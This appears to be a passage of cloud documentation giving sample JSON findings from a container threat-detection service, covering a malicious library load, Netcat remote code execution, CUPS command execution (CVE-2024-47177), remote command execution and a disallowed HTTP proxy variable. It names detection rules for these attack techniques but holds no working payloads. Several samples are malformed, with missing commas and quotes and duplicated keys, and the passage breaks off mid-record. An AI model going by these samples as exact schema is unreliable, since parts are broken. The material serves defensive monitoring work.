{   "finding": {     "access": {},     "application": {},     "attackExposure": {},     "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"     "category": "Execution: Modified Malicious Library Loaded",     "cloudDlpDataProfile": {},     "cloudDlpInspection": {},     "containers": [       {         "name": "CONTAINER_NAME",         "uri": "CONTAINER_URI",         "imageId": "CONTAINER_IMAGE_ID"       }     ],     "createTime": "2023-11-13T21:38:55.271Z",     "database": {},     "eventTime": "2023-11-13T21:38:55.133Z",     "exfiltration": {},     "findingClass": "THREAT",     "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",     "indicator": {},     "kernelRootkit": {},     "kubernetes": {       "pods": [         {           "name": "CONTAINER_NAME",           "ns": "default",           "containers": [                 {                   "name": "CONTAINER_NAME",                   "uri": "CONTAINER_URI",                   "imageId": CONTAINER_IMAGE_ID"                 }           ]         }       ],       "nodes": [         {           "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE"         }       ]     },     "mitreAttack": {       "primaryTactic": "EXECUTION",       "primaryTechniques": [         "SHARED_MODULES"       ]     },     "mute": "UNDEFINED",     "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",     "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",     "parentDisplayName": "Container Threat Detection",     "processes": [       {         "binary": {           "path": "\"/malicious_files/drop_mal_lib\"",           "size": "5005064",           "sha256": "fe2e70de9f77047d3bf5debe3135811300c9c69b937b7fd3e2ca8451a942d5fb",           "hashedSize": "5005064",           "partiallyHashed": false         },         "libraries": [           {             "path": "\"/malicious_files/file_to_be_modified\"",             "size": "68",             "sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",             "hashedSize": "68",             "partiallyHashed": false           }         ],         "script": {           "size": "0",           "hashedSize": "0",           "partiallyHashed": false         },         "args": [           "\"/malicious_files/drop_mal_lib\"",           "\"/malicious_files/file_to_be_modified\"",           "\"/tmp/modified-malicious-library-430bbedd7049b0d1\""         ],         "argumentsTruncated": false,         "envVariables": [           {             "name": "\"KUBERNETES_SERVICE_PORT\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT\"",             "val": "\"tcp://10.77.124.129:443\""           },           {             "name": "\"HOSTNAME\"",             "val": "\"ktd-test-modified-malicious-library\""           },           {             "name": "\"HOME\"",             "val": "\"/root\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",             "val": "\"10.77.124.129\""           },           {             "name": "\"PATH\"",             "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",             "val": "\"tcp\""           },           {             "name": "\"DEBIAN_FRONTEND\"",             "val": "\"noninteractive\""           },           {             "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP\"",             "val": "\"tcp://10.77.124.129:443\""           },           {             "name": "\"KUBERNETES_SERVICE_HOST\"",             "val": "\"10.77.124.129\""           },           {             "name": "\"PWD\"",             "val": "\"/malicious_files\""           }         ],         "pid": "8",         "parentPid": "1"       }     ],     "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",     "securityPosture": {},     "severity": "CRITICAL",     "state": "ACTIVE",     "vulnerability": {},     "externalSystems": {}   },   "resource": {     "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",     "display_name": "CLUSTER_ID",     "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",     "project_display_name": "PROJECT_ID",     "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",     "parent_display_name": "PROJECT_ID",     "type": "google.container.Cluster",     "folders": []   },   "sourceProperties": {     "sourceId": {       "projectNumber": "PROJECT_NUMBER",       "customerOrganizationNumber": "ORGANIZATION_NUMBER"     },     "detectionCategory": {       "ruleName": "modified_malicious_library_loaded"     },     "detectionPriority": "CRITICAL",     "affectedResources": [       {         "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"       }     ],     "evidence": [       {         "sourceLogId": {           "projectId": "PROJECT_ID",           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": {             "seconds": "1699911519",             "nanos": 124151422           }         }       }     ],     "properties": {},     "findingId": "FINDING_ID",     "contextUris": {       "mitreUri": {         "displayName": "MITRE Link",         "url": "https://attack.mitre.org/techniques/T1129/"       },       "virustotalIndicatorQueryUri": [         {           "displayName": "VirusTotal IP Link",           "url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection"         }       ],       "cloudLoggingQueryUri": [         {           "displayName": "Cloud Logging Query Link",           "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T21:38:39.124151422Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"         }       ],       "relatedFindingUri": {}     }   } }   

Execução: execução remota de código do Netcat no contentor

{   "finding": {     "access": {},     "application": {},     "attackExposure": {},     "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",     "category": "Execution: Netcat Remote Code Execution in Container",     "cloudDlpDataProfile": {},     "cloudDlpInspection": {},     "containers": [       {         "name": "CONTAINER_NAME",         "uri": "CONTAINER_IMAGE_URI",         "imageId": "CONTAINER_IMAGE_ID",         "createTime": "2024-06-17T18:50:13Z"       }     ],     "createTime": "2025-01-21T19:55:22.017Z",     "database": {},     "eventTime": "2025-01-21T19:55:21.762Z",     "exfiltration": {},     "findingClass": "THREAT",     "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",     "indicator": {},     "kernelRootkit": {},     "kubernetes": {       "pods": [         {           "name": "CONTAINER_NAME",           "ns": "NAMESPACE",           "containers": [             {               "name": "CONTAINER_NAME",               "uri": "CONTAINER_IMAGE_URI",               "imageId": "CONTAINER_IMAGE_ID",               "createTime": "2025-01-21T19:55:19Z"             }           ]         }       ],       "nodes": [         {           "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID"         }       ]     },     "logEntries": [       {         "cloudLoggingEntry": {           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": "2025-01-21T19:55:19.654640277Z"         }       }     ],     "mitreAttack": {},     "mute": "UNDEFINED",     "muteInfo": {       "staticMute": {         "state": "UNDEFINED",         "applyTime": "1970-01-01T00:00:00Z"       }     },     "mitreAttack": {       "primaryTactic": "PRIVILEGE_ESCALATION",       "primaryTechniques": [         "ESCAPE_TO_HOST"       ]     },     "mute": "UNDEFINED",     "muteInfo": {       "staticMute": {         "state": "UNDEFINED",         "applyTime": "1970-01-01T00:00:00Z"       }     },     "muteUpdateTime": "1970-01-01T00:00:00Z",     "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",     "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global",     "parentDisplayName": "Container Threat Detection",     "processes": [       {         "binary": {           "path": "INTERPRETER",           "size": "147176",           "sha256": "INTERPRETER_SHA_256",           "hashedSize": "147176",           "partiallyHashed": false,           "diskPath": {}         },         "script": {           "size": "0",           "hashedSize": "0",           "partiallyHashed": false,           "diskPath": {}         },         "args": [           "INTERPRETER",           "ARG"         ],         "argumentsTruncated": false,         "envVariables": [           {             "name": "\"KUBERNETES_SERVICE_PORT\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT\"",             "val": "\"tcp://34.118.224.1:443\""           },           {             "name": "\"HOSTNAME\"",             "val": "\"ktd-test-netcat-remote-code-execution-ba379a7c2168db11\""           },           {             "name": "\"HOME\"",             "val": "\"/root\""           },           {             "name": "\"GPG_KEY\"",             "val": "\"7169605F62C751356D054A26A821E680E5FA6305\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",             "val": "\"34.118.224.1\""           },           {             "name": "\"PATH\"",             "val": "\"/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",             "val": "\"tcp\""           },           {             "name": "\"LANG\"",             "val": "\"C.UTF-8\""           },           {             "name": "\"PYTHON_VERSION\"",             "val": "\"3.12.6\""           },           {             "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP\"",             "val": "\"tcp://34.118.224.1:443\""           },           {             "name": "\"KUBERNETES_SERVICE_HOST\"",             "val": "\"34.118.224.1\""           },           {             "name": "\"PWD\"",             "val": "\"/\""           }         ],         "pid": "9",         "parentPid": "1"       }     ],     "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "securityPosture": {},     "severity": "LOW",     "state": "ACTIVE",     "vulnerability": {},     "externalSystems": {}   },   "resource": {     "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "displayName": "CLUSTER_ID",     "type": "google.container.Cluster",     "cloudProvider": "GOOGLE_CLOUD_PLATFORM",     "service": "container.googleapis.com",     "location": "ZONE",     "gcpMetadata": {       "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "projectDisplayName": "PROJECT_ID",       "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "parentDisplayName": "PROJECT_ID",       "folders": [         {           "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",           "resourceFolderDisplayName": "FOLDER_ID"         }       ],       "organization": "organizations/ORGANIZATION_ID"     },     "resourcePath": {       "nodes": [         {           "nodeType": "GCP_PROJECT",           "id": "projects/PROJECT_ID",           "displayName": "PROJECT_ID"         },         {           "nodeType": "GCP_FOLDER",           "id": "folders/FOLDER_NUMBER",           "displayName": "FOLDER_ID"         },         {           "nodeType": "GCP_ORGANIZATION",           "id": "organizations/ORGANIZATION_ID"         }       ]     },     "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID"   },   "sourceProperties": {     "sourceId": {       "projectNumber": "PROJECT_NUMBER",       "customerOrganizationNumber": "ORGANIZATION_NUMBER"     },     "detectionCategory": {       "ruleName": "ktd_netcat_remote_code_execution_in_container"     },     "affectedResources": [       {         "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"       }     ],     "evidence": [       {         "sourceLogId": {           "projectId": "PROJECT_ID",           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": {             "seconds": "1729291973",             "nanos": 687426149           }         }       }     ],     "properties": {},     "findingId": "FINDING_ID",     "contextUris": {       "mitreUri": {         "displayName": "MITRE Link",         "url": "https://attack.mitre.org/techniques/T1059/004/"       },       "virustotalIndicatorQueryUri": [         {           "displayName": "VirusTotal File Link",           "url": "https://www.virustotal.com/gui/file/430cdef8f363efe8b7fe0ce4af583b202b77d89f0ded08e3b77ac6aca0a0b304/detection"         }       ],       "relatedFindingUri": {}     }   }, }     

Execução: possível execução de comandos arbitrários através do CUPS (CVE-2024-47177)

{   "finding": {     "access": {},     "application": {},     "attackExposure": {},     "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",     "category": "Execution: Possible Arbitrary Command Execution through CUPS (CVE-2024-47177)",     "chokepoint": {},     "cloudDlpDataProfile": {},     "cloudDlpInspection": {},     "containers": [       {         "name": "CONTAINER_NAME",         "uri": "CONTAINER_IMAGE_URI",         "imageId": "CONTAINER_IMAGE_ID",         "createTime": "2025-07-22T00:07:48Z"       }     ],     "createTime": "2025-07-22T00:07:54.853Z",     "database": {},     "dataProtectionKeyGovernance": {},     "eventTime": "2025-07-22T00:07:54.627Z",     "exfiltration": {},     "findingClass": "THREAT",     "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",     "indicator": {},     "kernelRootkit": {},     "kubernetes": {       "pods": [         {           "name": "CONTAINER_NAME",           "ns": "NAMESPACE",           "containers": [             {               "name": "CONTAINER_NAME",               "uri": "CONTAINER_IMAGE_URI",               "imageId": "CONTAINER_IMAGE_ID",               "createTime": "2025-01-21T19:55:19Z"             }           ]         }       ],       "nodes": [         {           "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID"         }       ]     },     "logEntries": [       {         "cloudLoggingEntry": {           "resourceContainer": "projects/770715367326",           "timestamp": "2025-07-22T00:07:48.052030557Z"         }       }     ],     "mitreAttack": {       "primaryTactic": "EXECUTION",       "primaryTechniques": [         "EXPLOITATION_FOR_CLIENT_EXECUTION"       ]     },     "mute": "UNDEFINED",     "muteInfo": {       "staticMute": {         "state": "UNDEFINED",         "applyTime": "1970-01-01T00:00:00Z"       }     },     "muteUpdateTime": "1970-01-01T00:00:00Z",     "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",     "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global",     "parentDisplayName": "Container Threat Detection",     "processes": [       {         "binary": {           "path": "\"/bin/dash\"",           "size": "121432",           "sha256": "2fdc4546e1f425bcaf62624a7118fd4ba86c11e6277e8b9ee63263eb0dcbc6c5",           "hashedSize": "121432",           "partiallyHashed": false,           "diskPath": {}         },         "script": {           "size": "0",           "hashedSize": "0",           "partiallyHashed": false,           "diskPath": {}         },         "args": [           "\"sh\"",           "\"-c\"",           "\"echo\"",           "\"hello\""         ],         "argumentsTruncated": false,         "envVariables": [           {             "name": "\"_\"",             "val": "\"/bin/sh\""           },           {             "name": "\"HOSTNAME\"",             "val": "\"ktd-test-cups-2025-07-22-00-07-44-utc\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",             "val": "\"tcp\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",             "val": "\"34.118.224.1\""           },           {             "name": "\"KUBERNETES_PORT\"",             "val": "\"tcp://34.118.224.1:443\""           },           {             "name": "\"PWD\"",             "val": "\"/\""           },           {             "name": "\"HOME\"",             "val": "\"/root\""           },           {             "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",             "val": "\"443\""           },           {             "name": "\"DEBIAN_FRONTEND\"",             "val": "\"noninteractive\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP\"",             "val": "\"tcp://34.118.224.1:443\""           },           {             "name": "\"SHLVL\"",             "val": "\"2\""           },           {             "name": "\"KUBERNETES_SERVICE_PORT\"",             "val": "\"443\""           },           {             "name": "\"PATH\"",             "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""           },           {             "name": "\"KUBERNETES_SERVICE_HOST\"",             "val": "\"34.118.224.1\""           }         ],         "pid": "9",         "parentPid": "8",         "userId": "0"       },       {         "binary": {           "path": "\"foomatic-rip\"",           "size": "0",           "hashedSize": "0",           "partiallyHashed": false,           "diskPath": {}         },         "script": {           "size": "0",           "hashedSize": "0",           "partiallyHashed": false,           "diskPath": {}         },         "argumentsTruncated": false,         "pid": "0",         "parentPid": "0",         "userId": "0"       }     ],     "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "securityPosture": {},     "severity": "CRITICAL",     "state": "ACTIVE",     "vulnerability": {},     "externalSystems": {}   },   "resource": {     "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "displayName": "CLUSTER_ID",     "type": "google.container.Cluster",     "cloudProvider": "GOOGLE_CLOUD_PLATFORM",     "service": "container.googleapis.com",     "location": "ZONE",     "gcpMetadata": {       "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "projectDisplayName": "PROJECT_ID",       "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "parentDisplayName": "PROJECT_ID",       "folders": [         {           "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",           "resourceFolderDisplayName": "FOLDER_ID"         }       ],       "organization": "organizations/ORGANIZATION_ID"     },     "resourcePath": {       "nodes": [         {           "nodeType": "GCP_PROJECT",           "id": "projects/PROJECT_ID",           "displayName": "PROJECT_ID"         },         {           "nodeType": "GCP_FOLDER",           "id": "folders/FOLDER_NUMBER",           "displayName": "FOLDER_ID"         },         {           "nodeType": "GCP_ORGANIZATION",           "id": "organizations/ORGANIZATION_ID"         }       ]     },     "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID"   },   "sourceProperties": {     "sourceId": {       "projectNumber": "PROJECT_NUMBER",       "customerOrganizationNumber": "ORGANIZATION_NUMBER"     },     "detectionCategory": {       "ruleName": "ktd_possible_arbitrary_command_execution_through_cups"     },     "detectionPriority": "CRITICAL",     "affectedResources": [       {         "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"       }     ],     "evidence": [       {         "sourceLogId": {           "projectId": "PROJECT_ID",           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": {             "seconds": "1729291973",             "nanos": 687426149           }         }       }     ],     "properties": {},     "findingId": "FINDING_ID",     "contextUris": {       "mitreUri": {         "displayName": "MITRE Link",         "url": "https://attack.mitre.org/tactics/TA0002/"       },       "virustotalIndicatorQueryUri": [         {           "displayName": "VirusTotal File Link",           "url": "https://www.virustotal.com/gui/file/2fdc4546e1f425bcaf62624a7118fd4ba86c11e6277e8b9ee63263eb0dcbc6c5/detection"         }       ],       "relatedFindingUri": {}     }   } }     

Execução: possível execução de comandos remotos detetada (pré-visualização)

{   "finding": {     "access": {},     "application": {},     "attackExposure": {},     "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",     "category": "Execution: Possible Remote Command Execution Detected",     "cloudDlpDataProfile": {},     "cloudDlpInspection": {},     "containers": [       {         "name": "CONTAINER_NAME",         "uri": "CONTAINER_IMAGE_URI",         "imageId": "CONTAINER_IMAGE_ID",         "createTime": "2024-06-17T18:50:13Z"       }     ],     "createTime": "2025-01-21T19:55:22.017Z",     "database": {},     "eventTime": "2025-01-21T19:55:21.762Z",     "exfiltration": {},     "findingClass": "THREAT",     "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",     "indicator": {},     "kernelRootkit": {},     "kubernetes": {       "pods": [         {           "name": "CONTAINER_NAME",           "ns": "NAMESPACE",           "containers": [             {               "name": "CONTAINER_NAME",               "uri": "CONTAINER_IMAGE_URI",               "imageId": "CONTAINER_IMAGE_ID",               "createTime": "2025-01-21T19:55:19Z"             }           ]         }       ],       "nodes": [         {           "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID"         }       ]     },     "logEntries": [       {         "cloudLoggingEntry": {           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": "2025-01-21T19:55:19.654640277Z"         }       }     ],     "mitreAttack": {       "primaryTactic": "EXECUTION",       "primaryTechniques": [         "COMMAND_AND_SCRIPTING_INTERPRETER"       ],       "additionalTactics": [         "COMMAND_AND_CONTROL"       ],       "additionalTechniques": [         "MULTI_STAGE_CHANNELS"       ]     },     "mute": "UNDEFINED",     "muteInfo": {       "staticMute": {         "state": "UNDEFINED",         "applyTime": "1970-01-01T00:00:00Z"       }     },     "muteUpdateTime": "1970-01-01T00:00:00Z",     "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",     "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global",     "parentDisplayName": "Container Threat Detection",     "processes": [       {         "binary": {           "path": "INTERPRETER",           "size": "147176",           "sha256": "INTERPRETER_SHA_256",           "hashedSize": "147176",           "partiallyHashed": false,           "diskPath": {}         },         "script": {           "size": "0",           "hashedSize": "0",           "partiallyHashed": false,           "diskPath": {}         },         "args": [           "INTERPRETER",           "ARG"         ],         "argumentsTruncated": false,         "envVariables": [           {             "name": "\"KUBERNETES_SERVICE_PORT\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT\"",             "val": "\"tcp://34.118.224.1:443\""           },           {             "name": "\"HOSTNAME\"",             "val": "\"ktd-test-remote-cmd-exec-ba379a7c2168db11\""           },           {             "name": "\"HOME\"",             "val": "\"/root\""           },           {             "name": "\"GPG_KEY\"",             "val": "\"7169605F62C751356D054A26A821E680E5FA6305\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",             "val": "\"34.118.224.1\""           },           {             "name": "\"PATH\"",             "val": "\"/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",             "val": "\"tcp\""           },           {             "name": "\"LANG\"",             "val": "\"C.UTF-8\""           },           {             "name": "\"PYTHON_VERSION\"",             "val": "\"3.12.6\""           },           {             "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP\"",             "val": "\"tcp://34.118.224.1:443\""           },           {             "name": "\"KUBERNETES_SERVICE_HOST\"",             "val": "\"34.118.224.1\""           },           {             "name": "\"PWD\"",             "val": "\"/\""           }         ],         "pid": "9",         "parentPid": "1"       }     ],     "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "securityPosture": {},     "severity": "MEDIUM",     "state": "ACTIVE",     "vulnerability": {},     "externalSystems": {}   },   "resource": {     "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "displayName": "CLUSTER_ID",     "type": "google.container.Cluster",     "cloudProvider": "GOOGLE_CLOUD_PLATFORM",     "service": "container.googleapis.com",     "location": "ZONE",     "gcpMetadata": {       "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "projectDisplayName": "PROJECT_ID",       "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "parentDisplayName": "PROJECT_ID",       "folders": [         {           "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",           "resourceFolderDisplayName": "FOLDER_ID"         }       ],       "organization": "organizations/ORGANIZATION_ID"     },     "resourcePath": {       "nodes": [         {           "nodeType": "GCP_PROJECT",           "id": "projects/PROJECT_ID",           "displayName": "PROJECT_ID"         },         {           "nodeType": "GCP_FOLDER",           "id": "folders/FOLDER_NUMBER",           "displayName": "FOLDER_ID"         },         {           "nodeType": "GCP_ORGANIZATION",           "id": "organizations/ORGANIZATION_ID"         }       ]     },     "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID"   },   "sourceProperties": {     "sourceId": {       "projectNumber": "PROJECT_NUMBER",       "customerOrganizationNumber": "ORGANIZATION_NUMBER"     },     "detectionCategory": {       "ruleName": "ktd_possible_remote_command_execution_detected"     },     "affectedResources": [       {         "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"       }     ],     "evidence": [       {         "sourceLogId": {           "projectId": "PROJECT_ID",           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": {             "seconds": "1729291973",             "nanos": 687426149           }         }       }     ],     "properties": {},     "findingId": "FINDING_ID",     "contextUris": {       "mitreUri": {         "displayName": "MITRE Link",         "url": "https://attack.mitre.org/techniques/T1059/"       },       "virustotalIndicatorQueryUri": [         {           "displayName": "VirusTotal File Link",           "url": "https://www.virustotal.com/gui/file/0d06f9724af41b13cdacea133530b9129a48450230feef9632d53d5bbb837c8c/detection"         }       ],       "relatedFindingUri": {}     }   }, }     

Execution: Program Run with Disallowed HTTP Proxy Env

{   "finding": {     "access": {},     "application": {},     "attackExposure": {},     "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",     "category": "Execution: Program Run with Disallowed HTTP Proxy Env",     "cloudDlpDataProfile": {},     "cloudDlpInspection": {},     "containers": [       {         "name": "CONTAINER_NAME",         "uri": "CONTAINER_IMAGE_URI",         "imageId": "CONTAINER_IMAGE_ID",         "createTime": "2024-06-17T18:50:13Z"       }     ],     "createTime": "2025-01-21T19:55:22.017Z",     "database": {},     "eventTime": "2025-01-21T19:55:21.762Z",     "exfiltration": {},     "findingClass": "THREAT",     "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",     "indicator": {},     "kernelRootkit": {},     "kubernetes": {       "pods": [         {           "name": "CONTAINER_NAME",           "ns": "NAMESPACE",           "containers": [             {               "name": "CONTAINER_NAME",               "uri": "CONTAINER_IMAGE_URI",               "imageId": "CONTAINER_IMAGE_ID",               "createTime": "2025-01-21T19:55:19Z"             }           ]         }       ],       "nodes": [         {           "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID"         }       ]     },     "logEntries": [       {         "cloudLoggingEntry": {           "resourceContainer": "projects/PROJECT_NUMBER",           "timestamp": "2025-01-21T19:55:19.654640277Z"         }       }     ],     "mitreAttack": {},     "mute": "UNDEFINED",     "muteInfo": {       "staticMute": {         "state": "UNDEFINED",         "applyTime": "1970-01-01T00:00:00Z"       }     },     "mitreAttack": {       "primaryTactic": "PRIVILEGE_ESCALATION",       "primaryTechniques": [         "ESCAPE_TO_HOST"       ]     },     "mute": "UNDEFINED",     "muteInfo": {       "staticMute": {         "state": "UNDEFINED",         "applyTime": "1970-01-01T00:00:00Z"       }     },     "muteUpdateTime": "1970-01-01T00:00:00Z",     "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",     "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global",     "parentDisplayName": "Container Threat Detection",     "processes": [       {         "binary": {           "path": "INTERPRETER",           "size": "147176",           "sha256": "INTERPRETER_SHA_256",           "hashedSize": "147176",           "partiallyHashed": false,           "diskPath": {}         },         "script": {           "size": "0",           "hashedSize": "0",           "partiallyHashed": false,           "diskPath": {}         },         "args": [           "INTERPRETER",           "ARG"         ],         "argumentsTruncated": false,         "envVariables": [           {             "name": "\"KUBERNETES_SERVICE_PORT\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT\"",             "val": "\"tcp://34.118.224.1:443\""           },           {             "name": "\"HOSTNAME\"",             "val": "\"ktd-test-program-with-http-proxy-ba379a7c2168db11\""           },           {             "name": "\"HOME\"",             "val": "\"/root\""           },           {             "name": "\"GPG_KEY\"",             "val": "\"7169605F62C751356D054A26A821E680E5FA6305\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",             "val": "\"34.118.224.1\""           },           {             "name": "\"PATH\"",             "val": "\"/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",             "val": "\"tcp\""           },           {             "name": "\"LANG\"",             "val": "\"C.UTF-8\""           },           {             "name": "\"PYTHON_VERSION\"",             "val": "\"3.12.6\""           },           {             "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",             "val": "\"443\""           },           {             "name": "\"KUBERNETES_PORT_443_TCP\"",             "val": "\"tcp://34.118.224.1:443\""           },           {             "name": "\"KUBERNETES_SERVICE_HOST\"",             "val": "\"34.118.224.1\""           },           {             "name": "\"PWD\"",             "val": "\"/\""           },           {             "name": "\"HTTP_PROXY\"",             "val": "\"http://localhost:8080\""           }         ],         "pid": "9",         "parentPid": "1"       }     ],     "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "securityPosture": {},     "severity": "LOW",     "state": "ACTIVE",     "vulnerability": {},     "externalSystems": {}   },   "resource": {     "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",     "displayName": "CLUSTER_ID",     "type": "google.container.Cluster",     "cloudProvider": "GOOGLE_CLOUD_PLATFORM",     "service": "container.googleapis.com",     "location": "ZONE",     "gcpMetadata": {       "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "projectDisplayName": "PROJECT_ID",       "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",       "parentDisplayName": "PROJECT_ID",       "folders": [         {           "resourceFolder": "//cloudresourcemanager.googleapis.com/folders/FOLDER_NUMBER",           "resourceFolderDisplayName": "FOLDER_ID"         }       ],       "organization": "organizations/ORGANIZATION_ID"     },     "resourcePath": {       "nodes": [         {           "nodeType": "GCP_PROJECT",           "id": "projects/PROJECT_ID",           "displayName": "PROJECT_ID"         },         {           "nodeType": "GCP_FOLDER",           "id": "folders/FOLDER_NUMBER",           "displayName": "FOLDER_ID"         },         {           "nodeType": "GCP_ORGANIZATION",           "id": "organizations/ORGANIZATION_ID"         }       ]     },     "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID"   },   "sourceProperties": {     "sourceId": {       "projectNumber": "PROJECT_NUMBER",       "customerOrganizationNumber": "ORGANIZATION_NUMBER"     },     "detectionCategory": {       "ruleName": "ktd_program_run_with_disallowed_http_proxy_env"     },     "affectedResources": [       {         "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"       }     ],     "evidence": [       {         "sourceLogId": {           "projectId": 